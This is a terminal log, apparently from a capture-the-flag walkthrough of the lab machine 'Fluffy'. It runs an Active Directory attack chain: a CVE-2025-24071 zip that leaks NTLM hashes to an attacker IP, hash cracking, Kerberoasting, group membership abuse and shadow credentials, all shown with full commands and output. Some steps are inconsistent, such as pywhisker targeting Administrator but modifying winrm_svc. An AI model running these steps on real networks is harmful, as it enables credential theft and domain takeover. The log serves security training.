Foothold

❯ git clone https://github.com/Marcejr117/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (42/42), done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 42 (delta 11), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (42/42), 2.12 MiB | 4.78 MiB/s, done.
Resolving deltas: 100% (11/11), done.
❯ cd CVE-2025-24071_PoC
❯ ls
PoC.py  README.md  usecase.gif
❯ python PoC.py hi 10.10.14.17


[+] File hi.library-ms created successfully.
❯ ls
exploit.zip  PoC.py  README.md  usecase.gif
❯ sudo responder -I tun0
❯ mv exploit.zip openme.zip
❯ smbclient -U 'j.fleischman%J0elTHEM4n1990!' //DC01/IT
Try "help" to get a list of possible commands.
smb: \> put openme.zip
putting file openme.zip as \openme.zip (1.4 kb/s) (average 1.4 kb/s)
smb: \> exit
❯ hashcat -m 5600 p.agila.hash ~/rockyou.txt -O
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 6800HS with Radeon Graphics, 10572/21208 MB (4096 MB allocatable), 16MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 4 MB

Dictionary cache hit:
* Filename..: /home/adot/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921506
* Keyspace..: 14344385

P.AGILA::FLUFFY:d72ce96bdacb6a55:f9a4feff02fc45bb961f6946de62eebb:01010000000000000097ec87ec33dc018b12ece97b1688300000000002000800300059005900440001001e00570049004e002d005a0043003700440041004c004400520055004200530004003400570049004e002d005a0043003700440041004c00440052005500420053002e0030005900590044002e004c004f00430041004c000300140030005900590044002e004c004f00430041004c000500140030005900590044002e004c004f00430041004c00070008000097ec87ec33dc01060004000200000008003000300000000000000001000000002000006093f0862f639e03ef0150d1cd5d66c5031b9ec4cc50cb77dce333b0ca13293e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310037000000000000000000:prometheusx-303

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:d72ce96bdacb6a55:f9a4feff02fc45bb96...000000
Time.Started.....: Thu Oct  2 22:41:53 2025 (2 secs)
Time.Estimated...: Thu Oct  2 22:41:55 2025 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/home/adot/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3524.7 kH/s (3.47ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4524149/14344385 (31.54%)
Rejected.........: 2165/4524149 (0.05%)
Restore.Point....: 4507759/14344385 (31.43%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: psynbd1 -> principoo1
Hardware.Mon.#1..: Temp: 80c Util: 73%

Started: Thu Oct  2 22:41:49 2025
Stopped: Thu Oct  2 22:41:56 2025
p.agila:prometheusx-303
❯ bloodhound-python -d fluffy.htb -u p.agila -p prometheusx-303 -ns 10.10.11.69 -c all --dns-timeout 30


INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 11S
❯ sudo ntpdate -u 10.10.11.69
2025-10-04 21:44:17.206471 (-0500) +25201.412697 +/- 0.024443 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.412697
❯ impacket-GetUserSPNs fluffy.htb/p.agila:prometheusx-303 -dc-ip 10.10.11.69 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName    Name       MemberOf                                       PasswordLastSet             LastLogon                   Delegation
----------------------  ---------  ---------------------------------------------  --------------------------  --------------------------  ----------
ADCS/ca.fluffy.htb      ca_svc     CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 11:07:50.136701  2025-05-21 17:21:15.969274
LDAP/ldap.fluffy.htb    ldap_svc   CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 11:17:00.599545  <never>
WINRM/winrm.fluffy.htb  winrm_svc  CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-05-17 19:51:16.786913  2025-05-19 10:13:22.188468

[-] CCache file is not found. Skipping...
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$4e3c34292747341871bb062c26922aaa$…
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$aca835d5761cea38198c50aa6fcb5259$…
$krb5tgs$23$*winrm_svc$FLUFFY.HTB$fluffy.htb/winrm_svc*$eac47de8cac33f91266e1f4f11672db5$…

No cracks

❯ net rpc group addmem "Service Accounts" "Administrator" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ net rpc group members "Service Accounts"  -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ pywhisker -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "Administrator" --action add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9f3b12fe-4a54-90ae-61e3-704a40ec48e0
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: n0n6HPdf.pfx
[*] Must be used with password: SCXgHzlrQWbasQcSM6WW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
❯ netexec smb 10.10.11.69 -u winrm_svc --pfx-cert n0n6HPdf.pfx --pfx-pass SCXgHzlrQWbasQcSM6WW
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\winrm_svc:33bd09dcd697600edf6b3a7af4875767